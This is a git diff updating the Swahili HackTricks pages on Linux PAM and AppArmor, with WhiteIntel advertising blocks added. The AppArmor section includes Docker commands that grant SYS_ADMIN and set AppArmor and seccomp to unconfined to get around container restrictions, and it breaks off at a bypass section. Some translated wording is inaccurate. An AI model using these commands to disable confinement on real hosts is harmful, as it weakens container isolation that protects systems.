diff --git a/linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md b/linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md index e5af2706c..1713cab63 100644 --- a/linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md +++ b/linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md @@ -1,28 +1,41 @@
-Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)! +Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)! Njia nyingine za kusaidia HackTricks: -* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)! -* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com) -* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family) +* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)! +* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com) +* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family) * **Jiunge na** πŸ’¬ [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github. +* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
+## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa **huduma za bure** za kuangalia ikiwa kampuni au wateja wake wame **vamiwa** na **malware za kuiba**. + +Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa. + +Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa: + +{% embed url="https://whiteintel.io" %} + +--- ## Taarifa Msingi -**PAM (Moduli za Uthibitishaji Zinazoweza Kusanikishwa)** inafanya kazi kama kifaa cha usalama ambacho **inathibitisha utambulisho wa watumiaji wanaojaribu kupata huduma za kompyuta**, kudhibiti upatikanaji wao kulingana na vigezo mbalimbali. Ni kama mlinzi wa dijiti, ikihakikisha kuwa ni watumiaji walioruhusiwa tu ndio wanaweza kutumia huduma maalum wakati inawezekana kupunguza matumizi yao ili kuzuia mzigo wa mfumo. +**PAM (Moduli za Uthibitishaji Zinazoweza Kusanikishwa)** inafanya kama kifaa cha usalama ambacho **huthibitisha utambulisho wa watumiaji wanaojaribu kupata huduma za kompyuta**, kudhibiti upatikanaji wao kulingana na vigezo mbalimbali. Ni kama mlinzi wa kidijitali, kuhakikisha kuwa watumiaji walioruhusiwa pekee wanaweza kushirikiana na huduma maalum huku wakizuia matumizi yao kuzuia mzigo kwenye mfumo. ### Faili za Usanidi -- **Mifumo ya Solaris na UNIX** kwa kawaida hutumia faili ya usanidi ya kati iliyo katika eneo la `/etc/pam.conf`. -- **Mifumo ya Linux** inapendelea njia ya saraka, ikihifadhi usanidi maalum wa huduma ndani ya `/etc/pam.d`. Kwa mfano, faili ya usanidi kwa huduma ya kuingia inapatikana katika `/etc/pam.d/login`. +- **Mifumo ya Solaris na UNIX** kwa kawaida hutumia faili ya usanidi wa kati iliyoko kwenye `/etc/pam.conf`. +- **Mifumo ya Linux** hupendelea njia ya saraka, kuhifadhi usanidi wa huduma maalum ndani ya `/etc/pam.d`. Kwa mfano, faili ya usanidi kwa huduma ya kuingia inapatikana kwenye `/etc/pam.d/login`. -Mfano wa usanidi wa PAM kwa huduma ya kuingia unaweza kuonekana kama ifuatavyo: +Mfano wa usanidi wa PAM kwa huduma ya kuingia unaweza kuonekana kama hivi: ```text auth required /lib/security/pam_securetty.so auth required /lib/security/pam_nologin.so @@ -37,40 +50,53 @@ session required /lib/security/pam_unix_session.so ``` ### **Maeneo ya Usimamizi wa PAM** -Maeneo haya, au vikundi vya usimamizi, vinajumuisha **uthibitisho**, **akaunti**, **nenosiri**, na **kikao**, kila moja ikihusika na vipengele tofauti vya mchakato wa uthibitisho na usimamizi wa kikao: +Maeneo haya, au vikundi vya usimamizi, vinajumuisha **uthibitisho**, **akaunti**, **nenosiri**, na **kikao**, kila moja ikihusika na sehemu tofauti za mchakato wa uthibitisho na usimamizi wa kikao: -- **Uthibitisho**: Inathibitisha kitambulisho cha mtumiaji, mara nyingi kwa kumuuliza nenosiri. +- **Uthibitisho**: Huthibitisha kitambulisho cha mtumiaji, mara nyingi kwa kumwomba nenosiri. - **Akaunti**: Inashughulikia uthibitisho wa akaunti, ikichunguza hali kama uanachama wa kikundi au vizuizi vya wakati wa siku. -- **Nenosiri**: Inasimamia sasisho za nenosiri, ikiwa ni pamoja na ukaguzi wa utata au kuzuia mashambulizi ya kamusi. -- **Kikao**: Inasimamia hatua wakati wa kuanza au kumaliza kikao cha huduma, kama vile kufunga saraka au kuweka mipaka ya rasilimali. +- **Nenosiri**: Inasimamia sasisho za nenosiri, ikiwa ni pamoja na ukaguzi wa ugumu au kuzuia mashambulizi ya kamusi. +- **Kikao**: Inasimamia hatua wakati wa kuanza au kumaliza kikao cha huduma, kama vile kupakia saraka au kuweka mipaka ya rasilimali. ### **Mipangilio ya Moduli ya PAM** -Mipangilio inaamua jinsi moduli itakavyojibu mafanikio au kushindwa, ikichochea mchakato wa uthibitisho kwa ujumla. Hii ni pamoja na: +Mipangilio inadhibiti jibu la moduli kwa mafanikio au kushindwa, ikichochea mchakato mzima wa uthibitisho. Hizi ni pamoja na: -- **Inahitajika**: Kushindwa kwa moduli inayohitajika kunasababisha kushindwa kwa mwisho, lakini baada ya kuchunguzwa kwa moduli zote zinazofuata. -- **Inahitajika Mara moja**: Kukatishwa kwa mchakato mara moja baada ya kushindwa. -- **Inatosha**: Mafanikio yanapuuza ukaguzi wa sehemu iliyobaki ya eneo hilo isipokuwa moduli inayofuata inashindwa. -- **Hiari**: Inasababisha kushindwa tu ikiwa ni moduli pekee katika safu. +- **Inahitajika**: Kushindwa kwa moduli inayohitajika kunasababisha kushindwa hatimaye, lakini baada ya kuchunguzwa moduli zote zifuatazo. +- **Lazima**: Kukoma mara moja kwa mchakato baada ya kushindwa. +- **Inatosha**: Mafanikio yanapuuza sehemu iliyobaki ya uchunguzi wa eneo hilo isipokuwa moduli inayofuata inashindwa. +- **Hiari**: Inasababisha kushindwa tu ikiwa ni moduli pekee katika mstari. -### Mfano wa Skena +### **Mfano wa Tukio** -Katika mazingira yenye moduli nyingi za uthibitisho, mchakato unafuata mpangilio thabiti. Ikiwa moduli ya `pam_securetty` inagundua kuwa kituo cha kuingia hakiruhusiwi, kuingia kwa mtumiaji wa mizizi kunazuiliwa, lakini moduli zote bado zinashughulikiwa kutokana na hadhi yake ya "inahitajika". Moduli ya `pam_env` inaweka mazingira ya pembejeo, ikisaidia uzoefu wa mtumiaji. Moduli za `pam_ldap` na `pam_unix` zinafanya kazi pamoja kuthibitisha mtumiaji, na `pam_unix` inajaribu kutumia nenosiri lililotolewa hapo awali, ikiboresha ufanisi na uwezo katika njia za uthibitisho. +Katika mazingira yenye moduli nyingi za uthibitisho, mchakato unafuata mpangilio wa kina. Ikiwa moduli ya `pam_securetty` inagundua terminali ya kuingia isiyo ruhusa, kuingia kama mtumiaji wa mizizi kunazuiliwa, lakini moduli zote bado zinachakatwa kutokana na hadhi yake ya "inahitajika". Moduli ya `pam_env` inaweka mazingira ya mazingira, ikisaidia uzoefu wa mtumiaji. Moduli za `pam_ldap` na `pam_unix` zinafanya kazi pamoja kuthibitisha mtumiaji, na `pam_unix` ikijaribu kutumia nenosiri lililotolewa hapo awali, ikiboresha ufanisi na mabadiliko katika njia za uthibitisho. ## Marejeo * [https://hotpotato.tistory.com/434](https://hotpotato.tistory.com/434) +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**. + +Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za kuiba habari. + +Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa: + +{% embed url="https://whiteintel.io" %} + +
Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)! Njia nyingine za kusaidia HackTricks: -* Ikiwa unataka kuona **kampuni yako ikionekana katika HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)! -* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com) -* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee -* **Jiunge na** πŸ’¬ [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)! +* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com) +* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee +* **Jiunge na** πŸ’¬ [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
diff --git a/linux-hardening/privilege-escalation/docker-security/apparmor.md b/linux-hardening/privilege-escalation/docker-security/apparmor.md index b27ab9f8e..5f7723b27 100644 --- a/linux-hardening/privilege-escalation/docker-security/apparmor.md +++ b/linux-hardening/privilege-escalation/docker-security/apparmor.md @@ -2,40 +2,54 @@
-Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)! +Jifunze kuhack AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)! Njia nyingine za kusaidia HackTricks: -* Ikiwa unataka kuona **kampuni yako inayotangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)! -* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com) -* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee +* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)! +* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com) +* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee * **Jiunge na** πŸ’¬ [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github. +* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
+## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** kuchunguza ikiwa kampuni au wateja wake wame **vamiwa** na **malware za wizi**. + +Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba habari. + +Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa: + +{% embed url="https://whiteintel.io" %} + +--- + ## Taarifa Msingi -AppArmor ni **uboreshaji wa kernel ulioundwa kuzuia rasilimali zinazopatikana kwa programu kupitia maelezo ya kila programu**, kwa ufanisi kutekeleza Udhibiti wa Upatikanaji wa Lazima (MAC) kwa kuunganisha sifa za udhibiti wa upatikanaji moja kwa moja kwa programu badala ya watumiaji. Mfumo huu hufanya kazi kwa **kupakia maelezo ya kila programu kwenye kernel**, kawaida wakati wa kuanza, na maelezo haya yanadhibiti ni rasilimali gani programu inaweza kupata, kama vile uhusiano wa mtandao, upatikanaji wa soketi za moja kwa moja, na ruhusa za faili. +AppArmor ni **uboreshaji wa kernel ulioundwa kuzuia rasilimali zilizopo kwa programu kupitia maelezo ya kila programu**, ikitekeleza Udhibiti wa Kufikia wa Lazima (MAC) kwa kufunga sifa za kudhibiti upatikanaji moja kwa moja kwa programu badala ya watumiaji. Mfumo huu hufanya kazi kwa **kupakia maelezo ya kila programu kwenye kernel**, kawaida wakati wa kuanza, na maelezo haya yanadhibiti ni rasilimali gani programu inaweza kupata, kama vile uhusiano wa mtandao, ufikiaji wa soketi za moja kwa moja, na ruhusa za faili. -Kuna njia mbili za uendeshaji kwa maelezo ya kila programu ya AppArmor: +Kuna njia mbili za uendeshaji kwa maelezo ya AppArmor: -- **Njia ya Utekelezaji**: Njia hii inatekeleza kikamilifu sera zilizoelezwa ndani ya maelezo ya kila programu, kwa kuzuia vitendo vinavyokiuka sera hizi na kurekodi jaribio lolote la kukiuka sera hizo kupitia mifumo kama syslog au auditd. -- **Njia ya Malalamiko**: Tofauti na njia ya utekelezaji, njia ya malalamiko haikatazi vitendo vinavyokwenda kinyume na sera za maelezo ya kila programu. Badala yake, inarekodi majaribio haya kama uvunjaji wa sera bila kutekeleza vizuizi. +- **Hali ya Utekelezaji**: Hali hii inatekeleza sera zilizoelezwa ndani ya maelezo, ikizuia vitendo vinavyokiuka sera hizi na kuingiza jaribio lolote la kukiuka kupitia mifumo kama syslog au auditd. +- **Hali ya Malalamiko**: Tofauti na hali ya utekelezaji, hali ya malalamiko haikazi vitendo vinavyokwenda kinyume na sera za maelezo. Badala yake, inaingiza jaribio hizi kama uvunjaji wa sera bila kutekeleza vizuizi. ### Vipengele vya AppArmor -- **Moduli ya Kernel**: Inahusika na utekelezaji wa sera. -- **Sera**: Zinaeleza sheria na vizuizi kwa tabia ya programu na upatikanaji wa rasilimali. -- **Kisomaji**: Inapakia sera kwenye kernel kwa utekelezaji au taarifa. -- **Zana**: Hizi ni programu za mode ya mtumiaji ambazo zinatoa kiolesura cha kuwasiliana na kusimamia AppArmor. +- **Moduli ya Kernel**: Inayowajibika kwa utekelezaji wa sera. +- **Sera**: Hufafanua sheria na vizuizi kwa tabia ya programu na ufikiaji wa rasilimali. +- **Mchambuzi**: Hupakia sera kwenye kernel kwa utekelezaji au kuripoti. +- **Zana**: Hizi ni programu za mode ya mtumiaji zinazotoa kiolesura cha kuingiliana na kusimamia AppArmor. -### Njia za Maelezo ya AppArmor +### Njia ya Maelezo -Maelezo ya AppArmor kawaida hufungwa katika _**/etc/apparmor.d/**_\ -Kwa kutumia `sudo aa-status` utaweza kuorodhesha programu ambazo zimezuiliwa na maelezo ya kila programu. Ikiwa unaweza kubadilisha herufi "/" na kipindi cha njia ya kila programu iliyoorodheshwa, utapata jina la maelezo ya AppArmor ndani ya folda iliyotajwa. +Maelezo ya Apparmor kawaida hufutwa katika _**/etc/apparmor.d/**_\ +Kwa `sudo aa-status` utaweza kuorodhesha programu zilizozuiwa na maelezo fulani. Ikiwa unaweza kubadilisha herufi "/" kwa kipindi cha njia ya kila programu iliyoorodheshwa utapata jina la maelezo ya apparmor ndani ya folda iliyotajwa. -Kwa mfano, maelezo ya **AppArmor** kwa _/usr/bin/man_ yatakuwa yamehifadhiwa katika _/etc/apparmor.d/usr.bin.man_ +Kwa mfano, maelezo ya **apparmor** kwa _/usr/bin/man_ itapatikana katika _/etc/apparmor.d/usr.bin.man_ ### Amri ```bash @@ -49,32 +63,32 @@ aa-mergeprof #used to merge the policies ``` ## Kuunda wasifu -* Ili kuonyesha faili zilizoathiriwa, **njia kamili na alama za wilcard** zinaruhusiwa (kwa ajili ya kuchagua faili). -* Ili kuonyesha upatikanaji wa faili ambao programu itakuwa nayo, **udhibiti wa upatikanaji** ufuatao unaweza kutumika: +* Ili kuelezea programu inayohusika, **njia kamili na manyoya** huruhusiwa (kwa ajili ya kutambua faili) kwa kufafanua faili. +* Ili kuelezea ufikiaji ambao programu itakuwa nayo juu ya **faili** inaweza kutumika **udhibiti wa ufikiaji** zifuatazo: * **r** (kusoma) * **w** (kuandika) -* **m** (kumbukumbu ya ram kama inayoweza kutekelezwa) +* **m** (ramani ya kumbukumbu kama inayoweza kutekelezwa) * **k** (kufunga faili) * **l** (kuunda viungo vya ngumu) -* **ix** (kutekeleza programu nyingine na programu mpya inarithi sera) +* **ix** (kutekeleza programu nyingine na programu mpya kurithi sera) * **Px** (kutekeleza chini ya wasifu mwingine, baada ya kusafisha mazingira) * **Cx** (kutekeleza chini ya wasifu wa mtoto, baada ya kusafisha mazingira) * **Ux** (kutekeleza bila kizuizi, baada ya kusafisha mazingira) -* **Mipangilio** inaweza kuwekwa katika wasifu na inaweza kubadilishwa kutoka nje ya wasifu. Kwa mfano: @{PROC} na @{HOME} (ongeza #include \ kwenye faili ya wasifu) -* **Sheria za kukataa zinasaidiwa ili kubadilisha sheria za kuruhusu**. +* **Viarasa** vinaweza kutajwa katika maelezo na vinaweza kubadilishwa kutoka nje ya wasifu. Kwa mfano: @{PROC} na @{HOME} (ongeza #include \ kwenye faili ya wasifu) +* **Mipangilio ya kukataa inasaidia kubadilisha viwango vya kuruhusu**. ### aa-genprof -Ili kuanza kwa urahisi kuunda wasifu, apparmor inaweza kukusaidia. Ni rahisi kufanya **apparmor ichunguze vitendo vilivyofanywa na programu na kisha kukuruhusu kuamua vitendo gani unataka kuruhusu au kukataa**.\ +Ili kuanza kwa urahisi kuunda wasifu, apparmor inaweza kukusaidia. Ni rahisi kufanya **apparmor ichunguze vitendo vinavyofanywa na programu na kisha kuruhusu au kukataa vitendo**.\ Unahitaji tu kukimbia: ```bash sudo aa-genprof /path/to/binary ``` -Kisha, katika konsoli tofauti fanya vitendo vyote ambavyo kawaida programu itatekeleza: +Kisha, kwenye konsoli tofauti tekeleza hatua zote ambazo kawaida programu ya binary itatekeleza: ```bash /path/to/binary -a dosomething ``` -Kisha, katika konsoli ya kwanza bonyeza "**s**" na kisha katika hatua zilizorekodiwa eleza ikiwa unataka kuzipuuza, kuruhusu, au chochote. Ukimaliza bonyeza "**f**" na wasifu mpya utaundwa katika _/etc/apparmor.d/path.to.binary_ +Kisha, katika console ya kwanza bonyeza "**s**" na kisha katika hatua zilizorekodiwa eleza ikiwa unataka kusahau, kuruhusu, au chochote. Ukimaliza bonyeza "**f**" na wasifu mpya utaundwa katika _/etc/apparmor.d/path.to.binary_ {% hint style="info" %} Kwa kutumia mishale unaweza kuchagua unachotaka kuruhusu/kukataa/chochote @@ -82,7 +96,7 @@ Kwa kutumia mishale unaweza kuchagua unachotaka kuruhusu/kukataa/chochote ### aa-easyprof -Unaweza pia kuunda kigezo cha wasifu wa apparmor ya programu ya binary na: +Unaweza pia kuunda kiolezo cha wasifu wa apparmor wa binary na: ```bash sudo aa-easyprof /path/to/binary # vim:syntax=apparmor @@ -108,10 +122,10 @@ sudo aa-easyprof /path/to/binary } ``` {% hint style="info" %} -Tafadhali kumbuka kuwa kwa chaguo-msingi katika wasifu uliozalishwa hakuna kitu kinachoruhusiwa, kwa hivyo kila kitu kimekataliwa. Utahitaji kuongeza mistari kama `/etc/passwd r,` ili kuruhusu kusoma faili ya binary `/etc/passwd` kwa mfano. +Tafadhali elewa kwamba kwa chaguo-msingi katika wasifu ulioundwa hakuna kitu kilichoruhusiwa, kwa hivyo kila kitu kimekataliwa. Utahitaji kuongeza mistari kama `/etc/passwd r,` kuruhusu kusoma faili ya binary `/etc/passwd` kwa mfano. {% endhint %} -Kisha unaweza **kutekeleza** wasifu mpya na +Unaweza kisha **kutekeleza** wasifu mpya na ```bash sudo apparmor_parser -a /etc/apparmor.d/path.to.binary ``` @@ -122,10 +136,10 @@ Zana ifuatayo itasoma magogo na kuuliza mtumiaji ikiwa anataka kuruhusu baadhi y sudo aa-logprof ``` {% hint style="info" %} -Kwa kutumia mishale ya kibonyezo unaweza kuchagua unachotaka kuruhusu/kukataa/chochote +Kwa kutumia mishale unaweza kuchagua unachotaka kuruhusu/kukataa/au chochote {% endhint %} -### Kusimamia Profaili +### Kusimamia Wasifu ```bash #Main profile management commands apparmor_parser -a /etc/apparmor.d/profile.name #Load a new profile in enforce mode @@ -133,9 +147,9 @@ apparmor_parser -C /etc/apparmor.d/profile.name #Load a new profile in complain apparmor_parser -r /etc/apparmor.d/profile.name #Replace existing profile apparmor_parser -R /etc/apparmor.d/profile.name #Remove profile ``` -## Kumbukumbu +## Ripoti -Mfano wa kumbukumbu za **AUDIT** na **DENIED** kutoka kwa faili _/var/log/audit/audit.log_ ya programu inayoweza kutekelezwa **`service_bin`**: +Mfano wa **AUDIT** na **DENIED** ripoti kutoka _/var/log/audit/audit.log_ ya programu inayoweza kutekelezwa **`service_bin`**: ```bash type=AVC msg=audit(1610061880.392:286): apparmor="AUDIT" operation="getattr" profile="/bin/rcat" name="/dev/pts/1" pid=954 comm="service_bin" requested_mask="r" fsuid=1000 ouid=1000 type=AVC msg=audit(1610061880.392:287): apparmor="DENIED" operation="open" profile="/bin/rcat" name="/etc/hosts" pid=954 comm="service_bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 @@ -160,7 +174,7 @@ For more information, please see: https://wiki.ubuntu.com/DebuggingApparmor ``` ## Apparmor katika Docker -Tazama jinsi wasifu **docker-profile** wa docker unavyopakiwa kwa chaguo-msingi: +Tafadhali kumbuka jinsi wasifu **docker-profile** wa docker unavyopakiwa kwa chaguo-msingi: ```bash sudo aa-status apparmor module is loaded. @@ -176,87 +190,85 @@ apparmor module is loaded. /usr/lib/connman/scripts/dhclient-script docker-default ``` -Kwa chaguo-msingi, **Profaili ya Apparmor ya docker-default** inatengenezwa kutoka [https://github.com/moby/moby/tree/master/profiles/apparmor](https://github.com/moby/moby/tree/master/profiles/apparmor) +Kwa chaguo-msingi **Profaili ya Apparmor ya docker-default** inatengenezwa kutoka [https://github.com/moby/moby/tree/master/profiles/apparmor](https://github.com/moby/moby/tree/master/profiles/apparmor) -**Muhtasari wa profaili ya docker-default**: +**Muhtasari wa Profaili ya docker-default**: -* **Upatikanaji** wa mtandao wote -* **Uwezo wowote** haujatolewa (Hata hivyo, baadhi ya uwezo utatoka kwa kuingiza sheria za msingi za msingi kama vile #include \) -* **Kuandika** kwenye faili yoyote ya **/proc** **hairuhusiwi** -* **Subdirectories**/**faili** nyingine za /**proc** na /**sys** zinaruhusiwa kusoma/kuandika/kufunga/kuunganisha/kutekeleza -* **Kufunga** **hairuhusiwi** -* **Ptrace** inaweza kufanywa tu kwenye mchakato ambao umefungwa na **profaili sawa ya apparmor** +- **Upatikanaji** wa mtandao wote +- **Uwezo wowote** haujatambuliwa (Hata hivyo, baadhi ya uwezo utatoka kwa kuingiza sheria za msingi kama vile #include \) +- **Kuandika** kwenye faili yoyote ya **/proc** **hairuhusiwi** +- **Vidirisha vingine**/**faili** vya /**proc** na /**sys** **vinakatazwa** upatikanaji wa kusoma/kuandika/kufunga/kuunganisha/kutekeleza +- **Kufunga** **hairuhusiwi** +- **Ptrace** inaweza kufanywa kwenye mchakato ambao umefungwa na **profaili ile ile ya apparmor** -Maranyi unapo **kuanzisha chombo cha docker**, unapaswa kuona matokeo yafuatayo: +Maranyingi **unapoendesha chombo cha docker** unapaswa kuona matokeo yafuatayo: ```bash 1 processes are in enforce mode. docker-default (825) ``` -Tafadhali kumbuka kuwa **apparmor itazuia hata uwezo wa ruhusa** uliopewa kontena kwa chaguo-msingi. Kwa mfano, itaweza **kuzuia ruhusa ya kuandika ndani ya /proc hata kama uwezo wa SYS\_ADMIN umepewa** kwa sababu ya profaili ya apparmor ya docker kukataa ufikiaji huu kwa chaguo-msingi: +Tafadhali elewa kwamba **apparmor itazuia hata uwezo wa ruhusa** uliopewa kontena kwa chaguo-msingi. Kwa mfano, itaweza **kuzuia ruhusa ya kuandika ndani ya /proc hata kama uwezo wa SYS\_ADMIN umepewa** kwa sababu kwa chaguo-msingi, wasifu wa apparmor wa docker unakataa ufikiaji huu: ```bash docker run -it --cap-add SYS_ADMIN --security-opt seccomp=unconfined ubuntu /bin/bash echo "" > /proc/stat sh: 1: cannot create /proc/stat: Permission denied ``` -Unahitaji **kulemaza apparmor** ili kuepuka vizuizi vyake: +Unahitaji **kulemaza apparmor** ili kupita vizuizi vyake: ```bash docker run -it --cap-add SYS_ADMIN --security-opt seccomp=unconfined --security-opt apparmor=unconfined ubuntu /bin/bash ``` -Tafadhali kumbuka kwamba kwa chaguo-msingi **AppArmor** pia itakataza kontena kufunga folda kutoka ndani hata na uwezo wa SYS\_ADMIN. +Tafadhali kumbuka kwamba kwa chaguo-msingi **AppArmor** pia **itazuia kontena kufunga** folda kutoka ndani hata na uwezo wa SYS\_ADMIN. -Tafadhali kumbuka unaweza **kuongeza/kuondoa** uwezo kwa kontena ya docker (hii itakuwa bado imezuiliwa na njia za ulinzi kama **AppArmor** na **Seccomp**): +Tafadhali kumbuka unaweza **kuongeza/kuondoa** **uwezo** kwa kontena ya docker (hii bado itazuiliwa na njia za ulinzi kama **AppArmor** na **Seccomp**): -* `--cap-add=SYS_ADMIN` itaongeza uwezo wa `SYS_ADMIN` -* `--cap-add=ALL` itaongeza uwezo wote -* `--cap-drop=ALL --cap-add=SYS_PTRACE` itaondoa uwezo wote na kuongeza tu `SYS_PTRACE` +- `--cap-add=SYS_ADMIN` inapeana uwezo wa `SYS_ADMIN` +- `--cap-add=ALL` inapeana uwezo wote +- `--cap-drop=ALL --cap-add=SYS_PTRACE` inaondoa uwezo wote na inapeana tu `SYS_PTRACE` {% hint style="info" %} -Kawaida, unapogundua kuwa una uwezo wa **kipekee** uliopo **ndani** ya kontena ya **docker** lakini sehemu fulani ya shambulio haifanyi kazi, hii itakuwa kwa sababu **apparmor ya docker itazuia**. +Kawaida, unapopata kwamba una **uwezo wa kipekee** uliopo **ndani** ya **kontena ya docker** lakini sehemu fulani ya **kudukua haifanyi kazi**, hii ni kwa sababu **apparmor ya docker itakuwa inazuia**. {% endhint %} ### Mfano (Mfano kutoka [**hapa**](https://sreeninet.wordpress.com/2016/03/06/docker-security-part-2docker-engine/)) -Ili kuelezea utendaji wa AppArmor, niliumba maelezo mapya ya Docker "mydocker" na mstari ufuatao uliongezwa: +Ili kufafanua utendaji wa AppArmor, niliunda wasifu mpya wa Docker "mydocker" na mstari ufuatao uliongezwa: ``` deny /etc/* w, # deny write for all files directly in /etc (not in a subdir) ``` -Kuamsha wasifu, tunahitaji kufanya yafuatayo: +Ili kuanzisha wasifu, tunahitaji kufanya yafuatayo: ``` sudo apparmor_parser -r -W mydocker ``` -Kuorodhesha maelezo ya profaili, tunaweza kutumia amri ifuatayo. Amri hapa chini inaorodhesha maelezo ya profaili yangu mpya ya AppArmor. +Kutaja maelezo, tunaweza kutumia amri ifuatayo. Amri hapa chini inataja maelezo yangu ya AppArmor mpya. ``` $ sudo apparmor_status | grep mydocker mydocker ``` -Kama inavyoonekana hapa chini, tunapata kosa tunapojaribu kubadilisha "/etc/" kwani maelezo ya AppArmor yanazuia ufikiaji wa kuandika kwenye "/etc". +Kama inavyoonekana hapa chini, tunapata kosa tunapojaribu kubadilisha "/etc/" kwani wasifu wa AppArmor unazuia ufikiaji wa kuandika kwenye "/etc". ``` $ docker run --rm -it --security-opt apparmor:mydocker -v ~/haproxy:/localhost busybox chmod 400 /etc/hostname chmod: /etc/hostname: Permission denied ``` -### AppArmor Docker Kupita1 +### Kizuizi cha AppArmor cha Docker Bypass1 -Unaweza kupata **profaili ya apparmor inayotumika kwenye kontena** kwa kutumia: +Unaweza kupata ni **wasifu wa apparmor unaoendesha kontena** kwa kutumia: ```bash docker inspect 9d622d73a614 | grep lowpriv 